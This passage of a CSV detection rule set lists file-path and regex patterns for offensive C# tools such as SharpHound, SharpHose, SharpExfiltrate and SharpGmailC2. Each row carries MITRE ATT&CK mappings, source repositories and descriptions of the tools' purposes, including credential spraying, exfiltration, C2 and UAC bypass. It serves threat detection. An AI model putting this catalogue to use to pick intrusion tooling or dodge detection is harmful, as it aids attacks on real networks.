products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","18525" "*\SharpEfsPotato*",".{0,1000}\\SharpEfsPotato.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - 
T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","N/A","10","4","317","46","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z","18526" "*\SharpEfsPotato.pdb*",".{0,1000}\\SharpEfsPotato\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpEfsPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18527" "*\SharpEfsPotato.pdb*",".{0,1000}\\SharpEfsPotato\.pdb.{0,1000}","offensive_tool_keyword","SharpEfsPotato","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpEfsPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18528" "*\SharpElevator.cs*",".{0,1000}\\SharpElevator\.cs.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/SharpElevator","1","0","N/A","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","18529" "*\SharpElevator.exe*",".{0,1000}\\SharpElevator\.exe.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC 
bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/SharpElevator","1","0","N/A","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","18530" "*\SharpElevator.sln*",".{0,1000}\\SharpElevator\.sln.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/SharpElevator","1","0","N/A","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","18531" "*\SharPersist.exe*",".{0,1000}\\SharPersist\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18532" "*\SharPersist.exe*",".{0,1000}\\SharPersist\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18533" "*\SharPersist.exe*",".{0,1000}\\SharPersist\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18534" "*\SharPersist\*",".{0,1000}\\SharPersist\\.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","18535" "*\SharpEventLog.csproj*",".{0,1000}\\SharpEventLog\.csproj.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","0","N/A","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","18536" "*\SharpEventLog.exe*",".{0,1000}\\SharpEventLog\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 
- TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18537" "*\SharpEventLog.exe*",".{0,1000}\\SharpEventLog\.exe.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","0","N/A","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","18538" "*\SharpEventLog.pdb*",".{0,1000}\\SharpEventLog\.pdb.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","0","#content","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","18539" "*\SharpEventLog.sln*",".{0,1000}\\SharpEventLog\.sln.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","0","N/A","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","18540" "*\SharpEventLog-master*",".{0,1000}\\SharpEventLog\-master.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and 
maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","0","N/A","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","18541" "*\SharpExcelDCom.exe*",".{0,1000}\\SharpExcelDCom\.exe.{0,1000}","offensive_tool_keyword","SharpExShell","SharpExShell automates the DCOM lateral movment technique which abuses ActivateMicrosoftApp method of Excel application","T1021.003 - T1218.007 - T1127.001","TA0008 - TA0009 - TA0005","N/A","N/A","Lateral Movement","https://github.com/grayhatkiller/SharpExShell","1","0","N/A","N/A","8","1","70","15","2024-05-01T23:17:25Z","2023-10-30T18:16:41Z","18542" "*\SharpExcelibur.exe*",".{0,1000}\\SharpExcelibur\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18543" "*\SharpExec.exe*",".{0,1000}\\SharpExec\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18544" "*\SharpExec.exe*",".{0,1000}\\SharpExec\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18545" "*\SharpExec.exe*",".{0,1000}\\SharpExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18546" "*\SharpExfiltrate\*",".{0,1000}\\SharpExfiltrate\\.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","18547" "*\SharpExShell.exe*",".{0,1000}\\SharpExShell\.exe.{0,1000}","offensive_tool_keyword","SharpExShell","SharpExShell automates the DCOM lateral 
movment technique which abuses ActivateMicrosoftApp method of Excel application","T1021.003 - T1218.007 - T1127.001","TA0008 - TA0009 - TA0005","N/A","N/A","Lateral Movement","https://github.com/grayhatkiller/SharpExShell","1","0","N/A","N/A","8","1","70","15","2024-05-01T23:17:25Z","2023-10-30T18:16:41Z","18548" "*\SharpExShell.sln*",".{0,1000}\\SharpExShell\.sln.{0,1000}","offensive_tool_keyword","SharpExShell","SharpExShell automates the DCOM lateral movment technique which abuses ActivateMicrosoftApp method of Excel application","T1021.003 - T1218.007 - T1127.001","TA0008 - TA0009 - TA0005","N/A","N/A","Lateral Movement","https://github.com/grayhatkiller/SharpExShell","1","0","N/A","N/A","8","1","70","15","2024-05-01T23:17:25Z","2023-10-30T18:16:41Z","18549" "*\SharpFinder.exe*",".{0,1000}\\SharpFinder\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18550" "*\SharpFtpC2*",".{0,1000}\\SharpFtpC2.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","18551" 
"*\SharpGetTitle.exe*",".{0,1000}\\SharpGetTitle\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18552" "*\SharpGhostTask*",".{0,1000}\\SharpGhostTask.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","0","N/A","N/A","10","2","114","12","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z","18553" "*\SharpGmailC2*",".{0,1000}\\SharpGmailC2.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","N/A","10","10","260","47","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z","18554" "*\SharpGpo.exe*",".{0,1000}\\SharpGpo\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - 
TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18555" "*\SharpGpo.exe*",".{0,1000}\\SharpGpo\.exe.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18556" "*\SharpGPOAbuse.exe*",".{0,1000}\\SharpGPOAbuse\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18557" "*\SharpGPOAbuse.exe*",".{0,1000}\\SharpGPOAbuse\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation 
tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18558" "*\SharpGPOAbuse.exe*",".{0,1000}\\SharpGPOAbuse\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18559" "*\SharpGPOAbuse.pdb*",".{0,1000}\\SharpGPOAbuse\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGPOAbuse","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18560" "*\SharpGPOAbuse.pdb*",".{0,1000}\\SharpGPOAbuse\.pdb.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - 
TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGPOAbuse","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18561" "*\SharpGPOAbuse-master*",".{0,1000}\\SharpGPOAbuse\-master.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18562" "*\SharpGPOAbuse-master*",".{0,1000}\\SharpGPOAbuse\-master.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18563" "*\SharpGraphView.sln*",".{0,1000}\\SharpGraphView\.sln.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft Graph API post-exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","0","N/A","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","18564" "*\sharpgraphview\*",".{0,1000}\\sharpgraphview\\.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft Graph API post-exploitation toolkit","T1078.004 - 
T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","0","N/A","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","18565" "*\SharpHandler.exe*",".{0,1000}\\SharpHandler\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18566" "*\SharpHandler.exe*",".{0,1000}\\SharpHandler\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18567" "*\SharpHide.exe*",".{0,1000}\\SharpHide\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18568" "*\SharpHose.exe*",".{0,1000}\\SharpHose\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18569" "*\SharpHose.exe*",".{0,1000}\\SharpHose\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18570" "*\SharpHose.exe*",".{0,1000}\\SharpHose\.exe.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","N/A","N/A","10","4","312","62","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z","18571" "*\SharpHose\Program.cs*",".{0,1000}\\SharpHose\\Program\.cs.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows 
Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","N/A","N/A","10","4","312","62","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z","18572" "*\SharpHound.exe*",".{0,1000}\\SharpHound\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18573" "*\SharpHound.exe*",".{0,1000}\\SharpHound\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18574" "*\SharpHound.exe*",".{0,1000}\\SharpHound\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - 